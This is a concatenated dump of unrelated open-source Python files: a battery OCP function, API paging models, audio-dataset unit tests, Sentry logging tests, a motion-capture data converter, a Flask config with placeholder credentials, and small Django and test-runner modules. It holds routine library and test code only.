fileCh.setLevel(logging.DEBUG)
fileCh.setFormatter(formatter)
logger.addHandler(conoutCh)
logger.addHandler(fileCh) |
pybamm/input/parameters/lithium_ion/positive_electrodes/LiNiCoO2_Ecker2015/nco_ocp_Ecker2015_function.py | manjunathnilugal/PyBaMM | 330 | 12716507 | from pybamm import tanh
def nco_ocp_Ecker2015_function(sto):
"""
    NCO OCP as a function of stoichiometry [1, 2, 3].
References
----------
.. [1] <NAME>, et al. "Parameterization of a physico-chemical model of
a lithium-ion battery i. determination of parameters." Journal of the
Electrochemical Society 162.9 (2015): A1836-A1848.
.. [2] Ecker, Madeleine, et al. "Parameterization of a physico-chemical model of
a lithium-ion battery ii. model validation." Journal of The Electrochemical
Society 162.9 (2015): A1849-A1857.
    .. [3] <NAME>, et al. "Generalised single particle models for
       high-rate operation of graded lithium-ion electrodes: Systematic derivation
       and validation." Electrochimica Acta 339 (2020): 135862
Parameters
----------
sto : :class:`pybamm.Symbol`
        Stoichiometry of material (li-fraction)
"""
# LiNiCo from Ecker, Kabitz, Laresgoiti et al.
# Analytical fit (WebPlotDigitizer + gnuplot)
a = -2.35211
c = 0.0747061
d = 31.886
e = 0.0219921
g = 0.640243
h = 5.48623
i = 0.439245
j = 3.82383
k = 4.12167
m = 0.176187
n = 0.0542123
o = 18.2919
p = 0.762272
q = 4.23285
r = -6.34984
s = 2.66395
t = 0.174352
u_eq = (
a * sto
- c * tanh(d * (sto - e))
- r * tanh(s * (sto - t))
- g * tanh(h * (sto - i))
- j * tanh(k * (sto - m))
- n * tanh(o * (sto - p))
+ q
)
return u_eq
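# Minimal usage sketch (assumption: sto is a pybamm.Symbol such as pybamm.Scalar, as stated
# in the docstring; plain floats are not guaranteed to be accepted by pybamm.tanh):
#   import pybamm
#   u_eq = nco_ocp_Ecker2015_function(pybamm.Scalar(0.5))   # pybamm expression for the OCP in volts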
|
tekore/_model/paging.py | Allerter/tekore | 135 | 12716515 | <filename>tekore/_model/paging.py
from typing import Sequence
from dataclasses import dataclass
from .serialise import Model
@dataclass(repr=False)
class Paging(Model):
"""Paging base."""
href: str
items: Sequence[Model]
limit: int
next: str
@dataclass(repr=False)
class OffsetPaging(Paging):
"""
Offset paging base.
Paging that can be navigated both forward and back.
"""
total: int
offset: int
previous: str
@dataclass(repr=False)
class Cursor(Model):
"""Data cursor."""
after: str
@dataclass(repr=False)
class CursorPaging(Paging):
"""
Cursor paging base.
Paging that can be navigated only forward following the cursor.
"""
cursors: Cursor
def __post_init__(self):
self.cursors = Cursor(**self.cursors)
|
tests/test_multitrack.py | p42ul/medleydb | 125 | 12716523 | import unittest
import os
import yaml
from medleydb import multitrack
from medleydb import AUDIO_PATH
from medleydb import MIXING_COEFFICIENTS
class TestMultitrack(unittest.TestCase):
def setUp(self):
self.mtrack = multitrack.MultiTrack("NightPanther_Fire")
self.mtrack2 = multitrack.MultiTrack("Phoenix_ScotchMorris")
self.stem = self.mtrack.stems[8]
self.raw = self.mtrack.raw_audio[8][1]
def test_dataset_version_v1(self):
actual = self.mtrack.dataset_version
expected = 'V1'
self.assertEqual(expected, actual)
def test_dataset_version_v2(self):
mtrack = multitrack.MultiTrack("FennelCartwright_DearTessie")
actual = mtrack.dataset_version
expected = 'V2'
self.assertEqual(expected, actual)
def test_dataset_version_extra(self):
mtrack = multitrack.MultiTrack("AHa_TakeOnMe")
actual = mtrack.dataset_version
expected = 'EXTRA'
self.assertEqual(expected, actual)
def test_invalid_trackid(self):
with self.assertRaises(IOError):
multitrack.MultiTrack("RickAstley_NeverGonnaGiveYouUp")
def test_audio_path(self):
actual = self.mtrack.audio_path
expected = os.path.join(AUDIO_PATH, "NightPanther_Fire")
self.assertEqual(actual, expected)
def test_artist(self):
actual = self.mtrack.artist
expected = "NightPanther"
self.assertEqual(actual, expected)
def test_title(self):
actual = self.mtrack.title
expected = "Fire"
self.assertEqual(actual, expected)
def test_trackid(self):
actual = self.mtrack.track_id
expected = "NightPanther_Fire"
self.assertEqual(actual, expected)
def test_stem_length(self):
actual = len(self.mtrack.stems)
expected = 12
self.assertEqual(actual, expected)
def test_stem_type(self):
actual = type(self.stem)
expected = multitrack.Track
self.assertEqual(actual, expected)
def test_stem_component(self):
actual = self.stem.component
expected = ''
self.assertEqual(actual, expected)
def test_stem_duration(self):
actual = self.stem.duration
expected = None
self.assertEqual(actual, expected)
def test_stem_fname(self):
actual = os.path.basename(self.stem.audio_path)
expected = "NightPanther_Fire_STEM_08.wav"
self.assertEqual(actual, expected)
def test_stem_instrument(self):
actual = self.stem.instrument
expected = ["auxiliary percussion"]
self.assertEqual(actual, expected)
def test_stem_f0_type(self):
actual = self.stem.f0_type
expected = ["u"]
self.assertEqual(actual, expected)
def test_stem_mixpath(self):
actual = os.path.basename(self.stem.mix_path)
expected = "NightPanther_Fire_MIX.wav"
self.assertEqual(actual, expected)
def test_stem_pitch_annot_none(self):
actual = self.stem.pitch_annotation
expected = None
self.assertEqual(actual, expected)
def test_stem_pitch_pyin_none(self):
actual = self.stem.pitch_estimate_pyin
expected = None
self.assertEqual(actual, expected)
def test_stem_pitch_annot_exists(self):
actual = self.mtrack.stems[7].pitch_annotation
expected_len = 18268
self.assertEqual(len(actual), expected_len)
def test_stem_pitch_pyin_exists(self):
actual = self.mtrack.stems[7].pitch_estimate_pyin
expected_len = 25175
self.assertEqual(len(actual), expected_len)
def test_stem_raw_idx(self):
actual = self.stem.raw_idx
expected = None
self.assertEqual(actual, expected)
def test_stem_stem_idx(self):
actual = self.stem.stem_idx
expected = 8
self.assertEqual(actual, expected)
def test_raw_length1(self):
actual = len(self.mtrack.raw_audio)
expected = 12
self.assertEqual(actual, expected)
def test_raw_length2(self):
actual = len(multitrack.get_dict_leaves(self.mtrack.raw_audio))
expected = 55
self.assertEqual(actual, expected)
def test_raw_type(self):
actual = type(self.raw)
expected = multitrack.Track
self.assertEqual(actual, expected)
def test_raw_component(self):
actual = self.raw.component
expected = ''
self.assertEqual(actual, expected)
def test_raw_duration(self):
actual = self.raw.duration
expected = None
self.assertEqual(actual, expected)
def test_raw_fname(self):
actual = os.path.basename(self.raw.audio_path)
expected = "NightPanther_Fire_RAW_08_01.wav"
self.assertEqual(actual, expected)
def test_raw_instrument(self):
actual = self.raw.instrument
expected = ["cymbal"]
self.assertEqual(actual, expected)
def test_raw_f0type(self):
actual = self.raw.f0_type
expected = ["u"]
self.assertEqual(actual, expected)
def test_raw_mixpath(self):
actual = os.path.basename(self.raw.mix_path)
expected = "NightPanther_Fire_MIX.wav"
self.assertEqual(actual, expected)
def test_raw_pitch_annotation(self):
actual = self.raw.pitch_annotation
expected = None
self.assertEqual(actual, expected)
def test_raw_raw_idx(self):
actual = self.raw.raw_idx
expected = 1
self.assertEqual(actual, expected)
def test_raw_stem_idx(self):
actual = self.raw.stem_idx
expected = 8
self.assertEqual(actual, expected)
def test_stem_instruments(self):
actual = self.mtrack.stem_instruments
expected = [
'auxiliary percussion',
'brass section',
'drum machine',
'drum set',
'electric bass',
'male singer',
'string section',
'synthesizer',
'synthesizer',
'synthesizer',
'vocalists',
'vocalists',
]
print(actual)
self.assertEqual(actual, expected)
def test_raw_instruments_length(self):
actual = len(self.mtrack.raw_instruments)
expected = 55
self.assertEqual(actual, expected)
def test_raw_instruments(self):
actual = self.mtrack.raw_instruments[0:5]
expected = [
'brass section',
'brass section',
'brass section',
'brass section',
'cello'
]
self.assertEqual(actual, expected)
def test_has_melody(self):
actual = self.mtrack.has_melody
expected = True
self.assertEqual(actual, expected)
def test_predominant_stem_type(self):
actual = type(self.mtrack.predominant_stem)
expected = multitrack.Track
self.assertEqual(actual, expected)
def test_predominant_stem_component(self):
actual = self.mtrack.predominant_stem.component
expected = 'melody'
self.assertEqual(actual, expected)
def test_predominant_stem_stem_idx(self):
actual = self.mtrack.predominant_stem.stem_idx
expected = 7
self.assertEqual(actual, expected)
def test_melody_annotations(self):
actual_mel1 = self.mtrack.melody1_annotation
actual_mel2 = self.mtrack.melody2_annotation
actual_mel3 = self.mtrack.melody3_annotation
self.assertEqual(len(actual_mel1), 36692)
self.assertEqual(len(actual_mel2), 36692)
self.assertEqual(len(actual_mel3), 36692)
self.assertEqual(len(actual_mel1[0]), 2)
self.assertEqual(len(actual_mel2[0]), 2)
self.assertEqual(len(actual_mel3[0]), 3)
def test_melody_tracks(self):
mel_tracks = self.mtrack.melody_stems()
self.assertEqual(len(mel_tracks), 2)
self.assertEqual(mel_tracks[0].component, 'melody')
self.assertEqual(mel_tracks[0].stem_idx, 6)
self.assertEqual(len(mel_tracks[0].pitch_annotation), 6591)
def test_bass_tracks(self):
bass_tracks = self.mtrack.bass_stems()
self.assertEqual(len(bass_tracks), 1)
self.assertEqual(bass_tracks[0].component, 'bass')
self.assertEqual(bass_tracks[0].stem_idx, 1)
def test_num_stems(self):
actual = self.mtrack.num_stems()
expected = 12
self.assertEqual(actual, expected)
def test_num_raw(self):
actual = self.mtrack.num_raw()
expected = 55
self.assertEqual(actual, expected)
def test_stem_filepaths(self):
actual = len(self.mtrack.stem_filepaths())
expected = 12
self.assertEqual(actual, expected)
def test_raw_filepaths(self):
actual = len(self.mtrack.raw_filepaths())
expected = 55
self.assertEqual(actual, expected)
def test_stem_activations(self):
actual = self.mtrack.stem_activations
self.assertEqual(type(actual), list)
def test_stem_activations_v2(self):
actual = self.mtrack.stem_activations_v2
self.assertEqual(type(actual), list)
def test_activation_conf_from_stem1(self):
actual = self.mtrack.activation_conf_from_stem(3)[0]
expected = [0.0, 0.0474]
self.assertEqual(actual, expected)
def test_activation_conf_from_stem_v2(self):
actual = self.mtrack.activation_conf_from_stem(3, version='v2')[0]
expected = [0.0, 0.0474]
self.assertEqual(actual, expected)
def test_activation_conf_from_stem2(self):
actual = self.mtrack.activation_conf_from_stem(50)
expected = None
self.assertEqual(actual, expected)
def test_get_mixing_coefficient(self):
mtrack = multitrack.MultiTrack('AClassicEducation_NightOwl')
actual = mtrack._get_mixing_coefficient(3)
expected = 0.2
self.assertEqual(actual, expected)
def test_get_mixing_coefficient2(self):
actual = self.mtrack2._get_mixing_coefficient(3)
expected = 0.585016969071061
self.assertAlmostEqual(actual, expected)
class TestTrack(unittest.TestCase):
def test_track(self):
track = multitrack.Track(
'blurbophone', 'fake/path1', 'S12', 'fake/path2',
component='melody'
)
self.assertEqual(track.instrument, ['blurbophone'])
self.assertEqual(track.audio_path, 'fake/path1')
self.assertEqual(track.component, 'melody')
self.assertEqual(track.stem_idx, 12)
self.assertEqual(track.raw_idx, None)
self.assertEqual(track.mix_path, 'fake/path2')
self.assertEqual(track.pitch_path, None)
def test_track2(self):
track = multitrack.Track(
'kazoo', 'fake/path1', 50, 'fake/path2',
raw_idx='R07'
)
self.assertEqual(track.instrument, ['kazoo'])
self.assertEqual(track.audio_path, 'fake/path1')
self.assertEqual(track.component, '')
self.assertEqual(track.stem_idx, 50)
self.assertEqual(track.raw_idx, 7)
self.assertEqual(track.mix_path, 'fake/path2')
def test_track_equality(self):
track1 = multitrack.Track(
'blurbophone', 'fake/path1', 'S12', 'fake/path2',
component='melody'
)
track2 = multitrack.Track(
'blurbophone', 'fake/path1', 'S12', 'fake/path2',
component='melody'
)
actual = track1 == track2
expected = True
self.assertEqual(expected, actual)
def test_track_inequality(self):
track1 = multitrack.Track(
'blurbophone', 'fake/path1', 'S12', 'fake/path2',
component='melody'
)
track2 = multitrack.Track(
'kazoo', 'fake/path1', 50, 'fake/path2',
raw_idx='R07'
)
actual = track1 != track2
expected = True
self.assertEqual(expected, actual)
class TestPathBasedir(unittest.TestCase):
def test_basedir(self):
path = 'this/is/a/path'
actual = multitrack._path_basedir(path)
expected = 'path'
self.assertEqual(actual, expected)
def test_basedir2(self):
path = 'this/is/a/second/path/'
actual = multitrack._path_basedir(path)
expected = 'path'
self.assertEqual(actual, expected)
def test_basedir3(self):
path = 'this/is/a/path/with/an/ending/file.txt'
actual = multitrack._path_basedir(path)
expected = 'file.txt'
self.assertEqual(actual, expected)
class TestGetDictLeaves(unittest.TestCase):
def test_get_leaves(self):
test_dict = {
'a': ['z', 'y', 'x'],
'b': ['w', 't'],
'c': ['elephant'],
'd': {'asdf': ['z']},
'e': {'borg': ['foo']}
}
actual = multitrack.get_dict_leaves(test_dict)
expected = set(['z', 'y', 'x', 'w', 't', 'elephant', 'foo'])
self.assertEqual(actual, expected)
def test_get_leaves2(self):
mtrack = multitrack.MultiTrack('NightPanther_Fire')
test_dict = {
'a': mtrack,
'b': {1: mtrack, 2: mtrack},
'c': [mtrack],
'd': {'asdf': mtrack},
'e': {'borg': [mtrack]}
}
actual = multitrack.get_dict_leaves(test_dict)
expected = set([mtrack, mtrack, mtrack, mtrack, mtrack])
self.assertEqual(actual, expected)
class TestGetDuration(unittest.TestCase):
def test_get_duration(self):
actual = multitrack.get_duration(os.path.join(
os.path.dirname(__file__), 'data/short_audio.wav'))
expected = 4.0
self.assertEqual(actual, expected)
class TestReadAnnotationFile(unittest.TestCase):
def test_readpitch(self):
actual, header = multitrack.read_annotation_file(
os.path.join(os.path.dirname(__file__), 'data/pitch.csv')
)
expected = [
[0.023219954, 189.187],
[0.029024943, 191.782],
[0.034829931, 200.344]
]
self.assertEqual(actual, expected)
self.assertEqual(header, [])
def test_readmelody(self):
actual, header = multitrack.read_annotation_file(
os.path.join(os.path.dirname(__file__), 'data/melody.csv')
)
expected = [
[0.0, 0.0],
[0.0058049886621315194, 0.0],
[0.011609977324263039, 0.0],
[0.017414965986394557, 0.0],
[0.023219954648526078, 189.18700000000001]
]
self.assertEqual(actual, expected)
self.assertEqual(header, [])
def test_invalidpath(self):
actual, header = multitrack.read_annotation_file('blurb/blork/barg')
expected = None
self.assertEqual(actual, expected)
self.assertEqual(header, expected)
class TestGetValidInstrumentLabels(unittest.TestCase):
def setUp(self):
self.labels = multitrack.get_valid_instrument_labels()
test_taxonomy_fpath = os.path.join(
os.path.dirname(__file__), 'data/test_taxonomy.yaml')
with open(test_taxonomy_fpath, 'r') as fhandle:
self.test_taxonomy = yaml.load(fhandle)
def test_inclusion(self):
self.assertTrue('female singer' in self.labels)
def test_inclusion2(self):
self.assertTrue('erhu' in self.labels)
def test_exclusion(self):
self.assertFalse('squidward' in self.labels)
def test_alternate_taxonomy(self):
actual = multitrack.get_valid_instrument_labels(
taxonomy=self.test_taxonomy
)
expected = set([
'rick',
'morty',
'beth',
'summer',
'jerry',
'mrs pancakes',
'tiny rick',
'squanchy',
'traflorkians',
'unity'
])
self.assertEqual(actual, expected)
class TestIsValidInstrument(unittest.TestCase):
def test_valid_instrument(self):
actual = multitrack.is_valid_instrument('clarinet')
expected = True
self.assertEqual(actual, expected)
def test_invalid_instrument(self):
actual = multitrack.is_valid_instrument('Clarinet')
expected = False
self.assertEqual(actual, expected)
def test_invalid_instrument2(self):
actual = multitrack.is_valid_instrument('mayonnaise')
expected = False
self.assertEqual(actual, expected)
class TestGetDatasetVersion(unittest.TestCase):
def test_version_1(self):
actual = multitrack.get_dataset_version('MusicDelta_Beethoven')
expected = 'V1'
self.assertEqual(expected, actual)
def test_version_v2(self):
actual = multitrack.get_dataset_version("FennelCartwright_DearTessie")
expected = 'V2'
self.assertEqual(expected, actual)
def test_version_extra(self):
actual = multitrack.get_dataset_version("AHa_TakeOnMe")
expected = 'EXTRA'
self.assertEqual(expected, actual)
def test_version_bach10(self):
actual = multitrack.get_dataset_version("Bach10_05DieNacht")
expected = 'BACH10'
self.assertEqual(expected, actual)
def test_version_none(self):
actual = multitrack.get_dataset_version("ManateeCommune_Blueberry")
expected = ''
self.assertEqual(expected, actual)
|
projects/manipulathor_baselines/armpointnav_baselines/models/base_models.py | brandontrabucco/allenact | 187 | 12716528 | <filename>projects/manipulathor_baselines/armpointnav_baselines/models/base_models.py
import torch
import torch.nn as nn
class LinearActorHeadNoCategory(nn.Module):
def __init__(self, num_inputs: int, num_outputs: int):
super().__init__()
self.linear = nn.Linear(num_inputs, num_outputs)
nn.init.orthogonal_(self.linear.weight, gain=0.01)
nn.init.constant_(self.linear.bias, 0)
def forward(self, x: torch.FloatTensor): # type: ignore
x = self.linear(x) # type:ignore
assert len(x.shape) == 3
return x
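# Hypothetical usage sketch (shape convention assumed: [steps, samplers, hidden_dim]):
#   head = LinearActorHeadNoCategory(512, 13)
#   logits = head(torch.zeros(1, 4, 512))   # -> tensor of shape [1, 4, 13]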
|
vumi/tests/test_sentry.py | seidu626/vumi | 199 | 12716536 | """Tests for vumi.sentry."""
import logging
import base64
import json
import sys
import traceback
from twisted.internet.defer import inlineCallbacks, Deferred
from twisted.web import http
from twisted.python.failure import Failure
from twisted.python.log import LogPublisher
from vumi.tests.utils import MockHttpServer, LogCatcher
from vumi.sentry import (quiet_get_page, SentryLogObserver, vumi_raven_client,
SentryLoggerService)
from vumi.tests.helpers import VumiTestCase, import_skip
class TestQuietGetPage(VumiTestCase):
@inlineCallbacks
def setUp(self):
self.mock_http = MockHttpServer(self._handle_request)
self.add_cleanup(self.mock_http.stop)
yield self.mock_http.start()
def _handle_request(self, request):
request.setResponseCode(http.OK)
request.do_not_log = True
return "Hello"
@inlineCallbacks
def test_request(self):
with LogCatcher() as lc:
result = yield quiet_get_page(self.mock_http.url)
self.assertEqual(lc.logs, [])
self.assertEqual(result, "Hello")
class DummySentryClient(object):
def __init__(self):
self.exceptions = []
self.messages = []
self.teardowns = 0
def captureMessage(self, *args, **kwargs):
self.messages.append((args, kwargs))
def captureException(self, *args, **kwargs):
self.exceptions.append((args, kwargs))
def teardown(self):
self.teardowns += 1
class TestSentryLogObserver(VumiTestCase):
def setUp(self):
self.client = DummySentryClient()
self.obs = SentryLogObserver(self.client, 'test', "worker-1")
def test_level_for_event(self):
for expected_level, event in [
(logging.WARN, {'logLevel': logging.WARN}),
(logging.ERROR, {'isError': 1}),
(logging.INFO, {}),
]:
self.assertEqual(self.obs.level_for_event(event), expected_level)
def test_logger_for_event(self):
self.assertEqual(self.obs.logger_for_event({'system': 'foo,bar'}),
'test.foo.bar')
self.assertEqual(self.obs.logger_for_event({}), 'test')
def test_log_failure(self):
e = ValueError("foo error")
f = Failure(e)
self.obs({'failure': f, 'system': 'foo', 'isError': 1})
self.assertEqual(self.client.exceptions, [
(((type(e), e, None),),
{'data': {'level': 40, 'logger': 'test.foo'},
'tags': {'worker-id': 'worker-1'}}),
])
def test_log_traceback(self):
try:
raise ValueError("foo")
except ValueError:
f = Failure(*sys.exc_info())
self.obs({'failure': f, 'isError': 1})
[call_args] = self.client.exceptions
exc_info = call_args[0][0]
tb = ''.join(traceback.format_exception(*exc_info))
self.assertTrue('raise ValueError("foo")' in tb)
def test_log_warning(self):
self.obs({'message': ["a"], 'system': 'foo',
'logLevel': logging.WARN})
self.assertEqual(self.client.messages, [
(('a',),
{'data': {'level': 30, 'logger': 'test.foo'},
'tags': {'worker-id': 'worker-1'}})
])
def test_log_info(self):
self.obs({'message': ["a"], 'system': 'test.log'})
self.assertEqual(self.client.messages, []) # should be filtered out
class TestSentryLoggerService(VumiTestCase):
def setUp(self):
import vumi.sentry
self.client = DummySentryClient()
self.patch(vumi.sentry, 'vumi_raven_client', lambda dsn: self.client)
self.logger = LogPublisher()
self.service = SentryLoggerService("http://example.com/",
"test.logger",
"worker-1",
logger=self.logger)
@inlineCallbacks
def test_logging(self):
yield self.service.startService()
self.logger.msg("Hello", logLevel=logging.WARN)
self.assertEqual(self.client.messages, [
(("Hello",),
{'data': {'level': 30, 'logger': 'test.logger'},
'tags': {'worker-id': 'worker-1'}})
])
del self.client.messages[:]
yield self.service.stopService()
self.logger.msg("Foo", logLevel=logging.WARN)
self.assertEqual(self.client.messages, [])
@inlineCallbacks
def test_stop_not_running(self):
yield self.service.stopService()
self.assertFalse(self.service.running)
@inlineCallbacks
def test_start_stop(self):
self.assertFalse(self.service.registered())
self.assertEqual(self.client.teardowns, 0)
yield self.service.startService()
self.assertTrue(self.service.registered())
yield self.service.stopService()
self.assertFalse(self.service.registered())
self.assertEqual(self.client.teardowns, 1)
class TestRavenUtilityFunctions(VumiTestCase):
def setUp(self):
try:
import raven
raven # To keep pyflakes happy.
except ImportError, e:
import_skip(e, 'raven')
def mk_sentry_dsn(self):
proj_user = "4c96ae4ca518483192dd9917c03847c4"
proj_key = "<KEY>"
proj_no = 2
host, port = "example.com", "30000"
dsn = "http://%s:%s@%s:%s/%s" % (proj_user, proj_key, host, port,
proj_no)
return dsn
def parse_call(self, sentry_call):
args, kwargs = sentry_call
postdata = kwargs['postdata']
return json.loads(base64.b64decode(postdata).decode('zlib'))
def test_vumi_raven_client_capture_message(self):
import vumi.sentry
dsn = self.mk_sentry_dsn()
call_history = []
def fake_get_page(*args, **kw):
call_history.append((args, kw))
return Deferred()
self.patch(vumi.sentry, 'quiet_get_page', fake_get_page)
client = vumi_raven_client(dsn)
client.captureMessage("my message")
[sentry_call] = call_history
sentry_data = self.parse_call(sentry_call)
self.assertEqual(sentry_data['message'], "my message")
|
mmhuman3d/data/data_converters/amass.py | ykk648/mmhuman3d | 472 | 12716545 | <gh_stars>100-1000
import glob
import os
import numpy as np
from tqdm import tqdm
from mmhuman3d.data.data_structures.human_data import HumanData
from .base_converter import BaseConverter
from .builder import DATA_CONVERTERS
all_sequences = [
'ACCAD',
'BioMotionLab_NTroje',
'CMU',
'EKUT',
'Eyes_Japan_Dataset',
'HumanEva',
'KIT',
'MPI_HDM05',
'MPI_Limits',
'MPI_mosh',
'SFU',
'SSM_synced',
'TCD_handMocap',
'TotalCapture',
'Transitions_mocap',
]
@DATA_CONVERTERS.register_module()
class AmassConverter(BaseConverter):
"""AMASS dataset
    `AMASS: Archive of Motion Capture as Surface Shapes' ICCV'2019
More details can be found in the `paper
<https://files.is.tue.mpg.de/black/papers/amass.pdf>`__.
"""
def convert(self, dataset_path: str, out_path: str) -> dict:
"""
Args:
dataset_path (str): Path to directory where raw images and
annotations are stored.
out_path (str): Path to directory to save preprocessed npz file
Returns:
dict:
A dict containing keys video_path, smplh, meta, frame_idx
stored in HumanData() format
"""
# use HumanData to store all data
human_data = HumanData()
# structs we use
video_path_, frame_idx_ = [], []
smplh = {}
smplh['body_pose'] = []
smplh['global_orient'] = []
smplh['betas'] = []
smplh['transl'] = []
smplh['left_hand_pose'] = []
smplh['right_hand_pose'] = []
meta = {}
meta['gender'] = []
annot_dir = dataset_path
for seq_name in tqdm(all_sequences):
seq_folder = os.path.join(annot_dir, seq_name)
subjects = os.listdir(seq_folder)
for subject in tqdm(subjects):
pattern = os.path.join(seq_folder, subject, '*.npz')
action_list = sorted(glob.glob(pattern))
for action_file in action_list:
if action_file.endswith('shape.npz'):
continue
data = np.load(action_file)
# get smpl data
gender = data['gender']
betas = data['betas'][:10].reshape((-1, 10))
trans = data['trans'].reshape((-1, 3))
root_orient = data['poses'][:, :3]
pose_body = data['poses'][:, 3:66].reshape((-1, 21, 3))
pose_hand = data['poses'][:, 66:]
left_hand_pose = pose_hand[:, :45].reshape(-1, 15, 3)
right_hand_pose = pose_hand[:, 45:].reshape(-1, 15, 3)
# get video file
action_name = action_file.split('/')[-1].split('_poses')[0]
vid_id = os.path.join(seq_name, subject,
action_name + '.mp4')
mocap_framerate = int(data['mocap_framerate'])
sampling_freq = mocap_framerate // 10
num_frames = pose_body.shape[0]
for i in range(num_frames):
if i % sampling_freq != 0:
continue
smplh['body_pose'].append(pose_body[i])
smplh['global_orient'].append(root_orient[i])
smplh['betas'].append(betas)
smplh['transl'].append(trans[i])
smplh['left_hand_pose'].append(left_hand_pose[i])
smplh['right_hand_pose'].append(right_hand_pose[i])
meta['gender'].append(gender)
video_path_.append(vid_id)
frame_idx_.append(i)
# change list to np array
smplh['body_pose'] = np.array(smplh['body_pose']).reshape((-1, 21, 3))
smplh['global_orient'] = np.array(smplh['global_orient']).reshape(
(-1, 3))
smplh['betas'] = np.array(smplh['betas']).reshape((-1, 10))
smplh['transl'] = np.array(smplh['transl']).reshape((-1, 3))
smplh['left_hand_pose'] = np.array(smplh['left_hand_pose']).reshape(
(-1, 15, 3))
smplh['right_hand_pose'] = np.array(smplh['right_hand_pose']).reshape(
(-1, 15, 3))
meta['gender'] = np.array(meta['gender'])
human_data['video_path'] = video_path_
human_data['frame_idx'] = np.array(frame_idx_).reshape(-1)
human_data['meta'] = meta
human_data['config'] = 'amass'
human_data['smplh'] = smplh
# store data
if not os.path.isdir(out_path):
os.makedirs(out_path)
file_name = 'amass.npz'
out_file = os.path.join(out_path, file_name)
human_data.dump(out_file)
|
config.py | masonsxu/red-flask | 161 | 12716546 | <reponame>masonsxu/red-flask<gh_stars>100-1000
# -*- coding: utf-8 -*-
# @ Time : 2020/9/8 14:56
# @ Author : Redtree
# @ File : config.py
# @ Desc :
VERSION = 'V0.1'
'''
database_setting
'''
DIALCT = "mysql"
DRIVER = "pymysql"
USERNAME = "mysql-username"
PASSWORD = "<PASSWORD>"
HOST = "数据库连接地址"
PORT = "数据库服务端口"
DATABASE = "testdb"
DB_URI = "{}+{}://{}:{}@{}:{}/{}?charset=utf8".format(DIALCT,DRIVER,USERNAME,PASSWORD,HOST,PORT,DATABASE)
SQLALCHEMY_DATABASE_URI = DB_URI
SQLALCHEMY_POOL_SIZE = 5
SQLALCHEMY_POOL_TIMEOUT = 30
SQLALCHEMY_POOL_RECYCLE = 3600
SQLALCHEMY_MAX_OVERFLOW = 5
SQLALCHEMY_TRACK_MODIFICATIONS = False
'''
Flask-SQLAlchemy has its own event notification system layered on top of SQLAlchemy; to support it, it tracks modifications to the SQLAlchemy session.
This consumes extra resources, so the SQLALCHEMY_TRACK_MODIFICATIONS option lets you disable the modification tracking system.
The option currently defaults to True, but the default will change to False in the future, disabling the event system.
'''
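# Minimal sketch of wiring these settings into a Flask app (the module/object names are
# assumptions for illustration, not part of this file):
#   from flask import Flask
#   from flask_sqlalchemy import SQLAlchemy
#   app = Flask(__name__)
#   app.config.from_object('config')  # picks up the upper-case names defined here
#   db = SQLAlchemy(app)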
'''
WEB SETTING
'''
WEB_IP = 'localhost'
WEB_PORT = '5000'
# string encoding format
STRING_CODE = 'utf-8'
# encryption algorithm name
ENCRYPTION_SHA1 = 'sha1'
# token expiry time configuration (default one week = 604800 seconds; 5 minutes when testing)
TOKEN_EXPIRE = 604800
'''
db-select-habit
'''
USER_SALT_LENGTH = 4
PAGE_LIMIT = 10
DEFAULT_PAGE = 1 |
AutotestWebD/apps/littletool/views/tool.py | yangjourney/sosotest | 422 | 12716561 | <reponame>yangjourney/sosotest<filename>AutotestWebD/apps/littletool/views/tool.py
from django.shortcuts import render,HttpResponse
def jsoncn(request):
print(str(request))
context = {"jsonstr":request.GET.get("json","")}
return render(request, "littletool/jsoncn.html", context)
|
back/restapi/apps.py | ramonakira/piclodio3 | 120 | 12716587 | import sys
from django.apps import AppConfig
from utils.scheduler_manager import SchedulerManager
class RestapiConfig(AppConfig):
name = 'restapi'
def __init__(self, app_name, app_module):
super().__init__(app_name, app_module)
def ready(self):
argv = sys.argv
print(argv)
list_banned_argument = ["makemigrations", "migrate", "collectstatic", "dumpdata", "loaddata"]
if not any(x in list_banned_argument for x in argv):
# start the scheduler
scheduler_manager = SchedulerManager()
scheduler_manager.start()
# active signals
import restapi.signals
|
cgt/tests/test_examples.py | rohanraja/cgt_distributed | 698 | 12716589 | <reponame>rohanraja/cgt_distributed<gh_stars>100-1000
import subprocess, os.path as osp
from nose.plugins.skip import SkipTest
thisdir = osp.dirname(__file__)
def run_example(cmd, filedepends=None):
if filedepends and not osp.exists(filedepends):
raise SkipTest(cmd)
else:
subprocess.check_call(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
def skip_example(cmd):
raise SkipTest(cmd)
def test_examples():
mnist = "%s/../../downloads/mnist.npz"%thisdir
cifar = "%s/../../downloads/cifar10.npz"%thisdir
yield run_example, "CGT_FLAGS=backend=python python %s/../../examples/demo_mnist.py --unittest"%thisdir, mnist
yield run_example, "CGT_FLAGS=backend=native python %s/../../examples/demo_mnist.py --unittest"%thisdir,mnist
yield run_example, "python %s/../../examples/cgt_theano_feedforward_comparison.py --unittest"%thisdir,mnist
yield run_example, "CGT_FLAGS=backend=native python %s/../../examples/demo_cifar.py --unittest"%thisdir,cifar
yield run_example, "cd %s/../../examples/ && CGT_FLAGS=backend=native python demo_char_rnn.py --unittest"%thisdir
yield run_example, "CGT_FLAGS=backend=native python %s/../../examples/demo_neural_turing_machine.py --unittest"%thisdir
runipycmd = "runipy %s/../../examples/tutorial.ipynb"%thisdir
try:
import graphviz
yield run_example, runipycmd
except ImportError:
yield skip_example, runipycmd
if __name__ == "__main__":
import nose
nose.runmodule() |
etcmodel/layers/attention_test.py | deepneuralmachine/google-research | 23,901 | 12716616 | # coding=utf-8
# Copyright 2021 The Google Research Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Tests for attention layers."""
from absl.testing import parameterized
import numpy as np
import tensorflow as tf
from etcmodel import layers as etc_layers
# `attention` module used for testing `_expand_local_ids_to_blocks` helper.
from etcmodel.layers import attention
class LayersTest(tf.test.TestCase, parameterized.TestCase):
def assert_all_identical(self, *elements):
if not elements:
return
first_element = elements[0]
for element in elements[1:]:
self.assertIs(element, first_element)
@parameterized.named_parameters(
('using_gather', False),
('using_one_hot', True),
)
def test_relative_attention(self, use_one_hot_lookup):
tf.compat.v1.random.set_random_seed(1234)
np.random.seed(1234)
batch_size = 3
from_seq_len = 16
